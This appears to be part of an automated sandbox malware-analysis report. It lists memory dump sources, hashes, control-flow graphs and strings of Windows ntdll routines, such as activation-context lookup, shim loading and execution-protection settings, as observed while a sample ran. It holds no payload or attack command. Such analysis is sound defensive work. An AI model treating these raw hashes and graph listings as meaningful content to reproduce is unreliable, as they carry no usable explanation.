                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: aa5253552f06cdce89de6f3584eedbeb0153c8bafb0e2a122cf3128caea1bff4
                                                                                                                                                                                                  • Instruction ID: 34c2a1c533cc52bdc97f0967811d558b8aa8a1fc168be2a86b979b754cc3bf89
                                                                                                                                                                                                  • Opcode Fuzzy Hash: aa5253552f06cdce89de6f3584eedbeb0153c8bafb0e2a122cf3128caea1bff4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1790022530101003D5407258661860A400597E2301F51D816E4514515CD965885E6262
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 3e5cef719d268edf0c8fea00e0d14d36455aa81081c2084209e2cc76c4446c15
                                                                                                                                                                                                  • Instruction ID: d195799718eed99204fe1786806cd9495d12581e83b7dfb4113e188bd28300bb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3e5cef719d268edf0c8fea00e0d14d36455aa81081c2084209e2cc76c4446c15
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9290022560101502D5017258560461A000A47D1241F91C827A5124516ECA75899AB171
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: b8da1887150f7fb78805f8472bfd668e4aab7f0eef5f0257ace8511e2bf84ff5
                                                                                                                                                                                                  • Instruction ID: 41d6310b8eedced32c16e6f2804acb6f6ffedad24bd5092fd12865e3f08bc3f5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b8da1887150f7fb78805f8472bfd668e4aab7f0eef5f0257ace8511e2bf84ff5
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F690027520101402D5407258560474A000547D1301F51C816A9164515EC6A98DDD76A5
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: c756e2cd9a3a1fec07bf1ce892e8e693a5ddcf648cc83537d5a466117e159dc2
                                                                                                                                                                                                  • Instruction ID: f3fa77818b306246d2ee92b3ac44882f7e3e3f0e81bb123ec6a4d73b12edd021
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c756e2cd9a3a1fec07bf1ce892e8e693a5ddcf648cc83537d5a466117e159dc2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9F90022530101402D5026258561460A000987D2345F91C817E5524516DC675895BB172
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                                                  • Instruction ID: 151be80fe91bafb7e9f1fd8f2f5b3a4d43c08115666696ecd69053475be61818
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 881 3296a1f0-3296a269 call 328a2330 * 2 RtlDebugPrintTimes 887 3296a41f-3296a444 call 328a24d0 * 2 call 328d4b50 881->887 888 3296a26f-3296a27a 881->888 890 3296a2a4 888->890 891 3296a27c-3296a289 888->891 895 3296a2a8-3296a2b4 890->895 893 3296a28f-3296a295 891->893 894 3296a28b-3296a28d 891->894 897 3296a373-3296a375 893->897 898 3296a29b-3296a2a2 893->898 894->893 899 3296a2c1-3296a2c3 895->899 901 3296a39f-3296a3a1 897->901 898->895 902 3296a2b6-3296a2bc 899->902 903 3296a2c5-3296a2c7 899->903 904 3296a3a7-3296a3b4 901->904 905 3296a2d5-3296a2fd RtlDebugPrintTimes 901->905 907 3296a2be 902->907 908 3296a2cc-3296a2d0 902->908 903->901 909 3296a3b6-3296a3c3 904->909 910 3296a3da-3296a3e6 904->910 905->887 921 3296a303-3296a320 RtlDebugPrintTimes 905->921 907->899 912 3296a3ec-3296a3ee 908->912 913 3296a3c5-3296a3c9 909->913 914 3296a3cb-3296a3d1 909->914 915 3296a3fb-3296a3fd 910->915 912->901 913->914 917 3296a3d7 914->917 918 3296a4eb-3296a4ed 914->918 919 3296a3f0-3296a3f6 915->919 920 3296a3ff-3296a401 915->920 917->910 922 3296a403-3296a409 918->922 923 3296a447-3296a44b 919->923 924 3296a3f8 919->924 920->922 921->887 929 3296a326-3296a34c RtlDebugPrintTimes 921->929 927 3296a450-3296a474 RtlDebugPrintTimes 922->927 928 3296a40b-3296a41d RtlDebugPrintTimes 922->928 926 3296a51f-3296a521 923->926 924->915 927->887 933 3296a476-3296a493 RtlDebugPrintTimes 927->933 928->887 929->887 934 3296a352-3296a354 929->934 933->887 941 3296a495-3296a4c4 RtlDebugPrintTimes 933->941 935 3296a356-3296a363 934->935 936 3296a377-3296a38a 934->936 938 3296a365-3296a369 935->938 939 3296a36b-3296a371 935->939 940 3296a397-3296a399 936->940 938->939 939->897 939->936 942 3296a38c-3296a392 940->942 943 3296a39b-3296a39d 940->943 941->887 947 3296a4ca-3296a4cc 941->947 945 3296a394 942->945 946 3296a3e8-3296a3ea 942->946 943->901 945->940 946->912 948 3296a4f2-3296a505 947->948 949 3296a4ce-3296a4db 947->949 952 3296a512-3296a514 948->952 950 3296a4e3-3296a4e9 949->950 951 3296a4dd-3296a4e1 949->951 950->918 950->948 951->950 953 3296a516 952->953 954 3296a507-3296a50d 952->954 953->920 955 3296a50f 954->955 956 3296a51b-3296a51d 954->956 955->952 956->926
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                                  • String ID: HEAP:
                                                                                                                                                                                                  • API String ID: 3446177414-2466845122
                                                                                                                                                                                                  • Opcode ID: 3603594ac1343d95ff671508f4462713c4370c7d379ee9d8820c45f23013b07d
                                                                                                                                                                                                  • Instruction ID: 81cda6ca14c91db8dd55b6e74e37b332203ae40a9a1c5ebdb1140889c484d6a7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3603594ac1343d95ff671508f4462713c4370c7d379ee9d8820c45f23013b07d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2FA17A757083128FE714CE18C894A2AB7E9FF88768F18496DE946DB311EB70EC45CB91
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 957 328c7550-328c7571 958 328c75ab-328c75b9 call 328d4b50 957->958 959 328c7573-328c758f call 3289e580 957->959 964 32904443 959->964 965 328c7595-328c75a2 959->965 969 3290444a-32904450 964->969 966 328c75ba-328c75c9 call 328c7738 965->966 967 328c75a4 965->967 975 328c75cb-328c75e1 call 328c76ed 966->975 976 328c7621-328c762a 966->976 967->958 970 32904456-329044c3 call 3291ef10 call 328d8f40 RtlDebugPrintTimes BaseQueryModuleData 969->970 971 328c75e7-328c75f0 call 328c7648 969->971 970->971 989 329044c9-329044d1 970->989 971->976 981 328c75f2 971->981 975->969 975->971 979 328c75f8-328c7601 976->979 983 328c762c-328c762e 979->983 984 328c7603-328c7612 call 328c763b 979->984 981->979 988 328c7614-328c7616 983->988 984->988 991 328c7618-328c761a 988->991 992 328c7630-328c7639 988->992 989->971 993 329044d7-329044de 989->993 991->967 994 328c761c 991->994 992->991 993->971 995 329044e4-329044ef 993->995 996 329045c9-329045db call 328d2b70 994->996 998 329045c4 call 328d4c68 995->998 999 329044f5-3290452e call 3291ef10 call 328da9c0 995->999 996->967 998->996 1006 32904530-32904541 call 3291ef10 999->1006 1007 32904546-32904576 call 3291ef10 999->1007 1006->976 1007->971 1012 3290457c-3290458a call 328da690 1007->1012 1015 32904591-329045ae call 3291ef10 call 3290cc1e 1012->1015 1016 3290458c-3290458e 1012->1016 1015->971 1021 329045b4-329045bd 1015->1021 1016->1015 1021->1012 1022 329045bf 1021->1022 1022->971
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 32904592
                                                                                                                                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 32904507
                                                                                                                                                                                                  • ExecuteOptions, xrefs: 329044AB
                                                                                                                                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 32904530
                                                                                                                                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 32904460
                                                                                                                                                                                                  • Execute=1, xrefs: 3290451E
                                                                                                                                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 3290454D
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                                  • API String ID: 0-484625025
                                                                                                                                                                                                  • Opcode ID: dc891ec0d635943b76d775649cec73a4b321ebaffae7e53c9dae3474182a12fd
                                                                                                                                                                                                  • Instruction ID: 5a1d8b55199a054b7f44a082dd8c3f95782e5600a92a50559f17ed98864e97d7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: dc891ec0d635943b76d775649cec73a4b321ebaffae7e53c9dae3474182a12fd
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6B51F9B9A0032DAEEB149BA9DC95FADB3ACEF04344F4404E9D919A7281DB70DA45CF50
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 1526 328aa170-328aa18f 1527 328aa4ad-328aa4b4 1526->1527 1528 328aa195-328aa1b1 1526->1528 1527->1528 1531 328aa4ba-328f77c8 1527->1531 1529 328f77f3-328f77f8 1528->1529 1530 328aa1b7-328aa1c0 1528->1530 1530->1529 1532 328aa1c6-328aa1cc 1530->1532 1531->1528 1536 328f77ce-328f77d3 1531->1536 1534 328aa5da-328aa5dc 1532->1534 1535 328aa1d2-328aa1d4 1532->1535 1537 328aa1da-328aa1dd 1534->1537 1538 328aa5e2 1534->1538 1535->1529 1535->1537 1539 328aa393-328aa399 1536->1539 1537->1529 1540 328aa1e3-328aa1e6 1537->1540 1538->1540 1541 328aa1fa-328aa1fd 1540->1541 1542 328aa1e8-328aa1f1 1540->1542 1545 328aa203-328aa24b 1541->1545 1546 328aa5e7-328aa5f0 1541->1546 1543 328f77d8-328f77e2 1542->1543 1544 328aa1f7 1542->1544 1548 328f77e7-328f77f0 call 3291ef10 1543->1548 1544->1541 1549 328aa250-328aa255 1545->1549 1546->1545 1547 328aa5f6-328f780c 1546->1547 1547->1548 1548->1529 1552 328aa25b-328aa263 1549->1552 1553 328aa39c-328aa39f 1549->1553 1555 328aa26f-328aa27d 1552->1555 1556 328aa265-328aa269 1552->1556 1553->1555 1557 328aa3a5-328aa3a8 1553->1557 1559 328aa3ae-328aa3be 1555->1559 1560 328aa283-328aa288 1555->1560 1556->1555 1558 328aa4bf-328aa4c8 1556->1558 1557->1559 1561 328f7823-328f7826 1557->1561 1562 328aa4ca-328aa4cc 1558->1562 1563 328aa4e0-328aa4e3 1558->1563 1559->1561 1566 328aa3c4-328aa3cd 1559->1566 1564 328aa28c-328aa28e 1560->1564 1561->1564 1565 328f782c-328f7831 1561->1565 1562->1555 1567 328aa4d2-328aa4db 1562->1567 1568 328f780e 1563->1568 1569 328aa4e9-328aa4ec 1563->1569 1570 328f7833 1564->1570 1571 328aa294-328aa2ac call 328aa600 1564->1571 1572 328f7838 1565->1572 1566->1564 1567->1564 1573 328f7819 1568->1573 1569->1573 1574 328aa4f2-328aa4f5 1569->1574 1570->1572 1579 328aa3d2-328aa3d9 1571->1579 1580 328aa2b2-328aa2da 1571->1580 1576 328f783a-328f783c 1572->1576 1573->1561 1574->1562 1576->1539 1578 328f7842 1576->1578 1581 328aa2dc-328aa2de 1579->1581 1582 328aa3df-328aa3e2 1579->1582 1580->1581 1581->1576 1583 328aa2e4-328aa2eb 1581->1583 1582->1581 1584 328aa3e8-328aa3f3 1582->1584 1585 328f78ed 1583->1585 1586 328aa2f1-328aa2f4 1583->1586 1584->1549 1587 328f78f1-328f7909 call 3291ef10 1585->1587 1588 328aa300-328aa30a 1586->1588 1587->1539 1588->1587 1590 328aa310-328aa32c call 328aa760 1588->1590 1594 328aa332-328aa337 1590->1594 1595 328aa4f7-328aa500 1590->1595 1594->1539 1596 328aa339-328aa35d 1594->1596 1597 328aa502-328aa50b 1595->1597 1598 328aa521-328aa523 1595->1598 1599 328aa360-328aa363 1596->1599 1597->1598 1600 328aa50d-328aa511 1597->1600 1601 328aa549-328aa551 1598->1601 1602 328aa525-328aa543 call 32894428 1598->1602 1603 328aa3f8-328aa3fc 1599->1603 1604 328aa369-328aa36c 1599->1604 1605 328aa5a1-328aa5cb RtlDebugPrintTimes 1600->1605 1606 328aa517-328aa51b 1600->1606 1602->1539 1602->1601 1608 328f7847-328f784f 1603->1608 1609 328aa402-328aa405 1603->1609 1610 328aa372-328aa374 1604->1610 1611 328f78e3 1604->1611 1605->1598 1623 328aa5d1-328aa5d5 1605->1623 1606->1598 1606->1605 1614 328aa554-328aa56a 1608->1614 1618 328f7855-328f7859 1608->1618 1613 328aa40b-328aa40e 1609->1613 1609->1614 1615 328aa37a-328aa381 1610->1615 1616 328aa440-328aa459 call 328aa600 1610->1616 1611->1585 1613->1604 1619 328aa414-328aa42c 1613->1619 1614->1619 1624 328aa570-328aa579 1614->1624 1620 328aa49b-328aa4a2 1615->1620 1621 328aa387-328aa38c 1615->1621 1635 328aa57e-328aa585 1616->1635 1636 328aa45f-328aa487 1616->1636 1618->1614 1625 328f785f-328f7868 1618->1625 1619->1604 1628 328aa432-328aa43b 1619->1628 1620->1588 1631 328aa4a8 1620->1631 1621->1539 1629 328aa38e 1621->1629 1623->1598 1624->1610 1626 328f786a-328f786d 1625->1626 1627 328f7892-328f7894 1625->1627 1632 328f786f-328f7879 1626->1632 1633 328f787b-328f787e 1626->1633 1627->1614 1634 328f789a-328f78a3 1627->1634 1628->1610 1629->1539 1631->1585 1639 328f788e 1632->1639 1640 328f788b 1633->1640 1641 328f7880-328f7889 1633->1641 1634->1610 1637 328aa58b-328aa58e 1635->1637 1638 328aa489-328aa48b 1635->1638 1636->1638 1637->1638 1642 328aa594-328aa59c 1637->1642 1638->1621 1643 328aa491-328aa493 1638->1643 1639->1627 1640->1639 1641->1634 1642->1599 1644 328aa499 1643->1644 1645 328f78a8-328f78b1 1643->1645 1644->1620 1645->1644 1646 328f78b7-328f78bd 1645->1646 1646->1644 1647 328f78c3-328f78cb 1646->1647 1647->1644 1648 328f78d1-328f78dc 1647->1648 1648->1647 1649 328f78de 1648->1649 1649->1644
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 328F77E2
                                                                                                                                                                                                  • SsHd, xrefs: 328AA304
                                                                                                                                                                                                  • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 328F7807
                                                                                                                                                                                                  • RtlpFindActivationContextSection_CheckParameters, xrefs: 328F77DD, 328F7802
                                                                                                                                                                                                  • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 328F78F3
                                                                                                                                                                                                  • Actx , xrefs: 328F7819, 328F7880
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                                                                                                                                  • API String ID: 0-1988757188
                                                                                                                                                                                                  • Opcode ID: c15fe3d2417eed3dd04185b6e1cf84b4454199b3cbc76e78717e635d0dab6f28
                                                                                                                                                                                                  • Instruction ID: 27d8f03811958f71060dd55b92d6c3e55eb3a84810466dd785020dd90af78083
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c15fe3d2417eed3dd04185b6e1cf84b4454199b3cbc76e78717e635d0dab6f28
                                                                                                                                                                                                  • Instruction Fuzzy Hash: ACE1E17C6043829FE715CE64C8A07AA77F1BB84358F544A2DF969CBA90DF32D845CB81
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 328F9372
                                                                                                                                                                                                  • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 328F9153
                                                                                                                                                                                                  • GsHd, xrefs: 328AD794
                                                                                                                                                                                                  • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 328F9178
                                                                                                                                                                                                  • RtlpFindActivationContextSection_CheckParameters, xrefs: 328F914E, 328F9173
                                                                                                                                                                                                  • Actx , xrefs: 328F9315
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                                  • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                                                                                                                                  • API String ID: 3446177414-2196497285
                                                                                                                                                                                                  • Opcode ID: b52a03bf59d12f42eebe82d81af9c910f75184360ec81d14dba86731a40b8df4
                                                                                                                                                                                                  • Instruction ID: e1ffef3421fbba5c7e8fcfcc51359b5dcc9e516e69d8ba36f5bca18656c80573
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b52a03bf59d12f42eebe82d81af9c910f75184360ec81d14dba86731a40b8df4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: AFE1B0BC6083459FE704CF14C890B5AB7E4BF8875CF444A2DE999CB281DB71E885CB92
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                                  • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                                                                                                                                                  • API String ID: 3446177414-4227709934
                                                                                                                                                                                                  • Opcode ID: 600147158d1db2533956cac696a17e94d589d33dd03d2d4ee640d019001d00e2
                                                                                                                                                                                                  • Instruction ID: ce02d5ab67bf80f3670ffb03850316a47cbd950f65f4d3e25a2efd9ad16fc935
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 600147158d1db2533956cac696a17e94d589d33dd03d2d4ee640d019001d00e2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A9414BB9A0520DABDB01CF99C980AEEBBB9BF48754F148069ED04A7350DB719A41CF90
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 328E9843
                                                                                                                                                                                                  • LdrpLoadShimEngine, xrefs: 328E984A, 328E988B
                                                                                                                                                                                                  • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 328E9885
                                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 328E9854, 328E9895
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                                  • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                  • API String ID: 3446177414-3589223738
                                                                                                                                                                                                  • Opcode ID: 71876ef035bf1a66ba633819353c1c2e15255a3146449051a094142ca16c567a
                                                                                                                                                                                                  • Instruction ID: 61e81d068d3b5381171c13ca5437921f4167c6fa07477aa468f997068e491ec7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 71876ef035bf1a66ba633819353c1c2e15255a3146449051a094142ca16c567a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C51253AA053689FEB04DFACCC54FAD77A6AF44314F080525E965BF296DBB09C46C780
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DebugPrintTimes
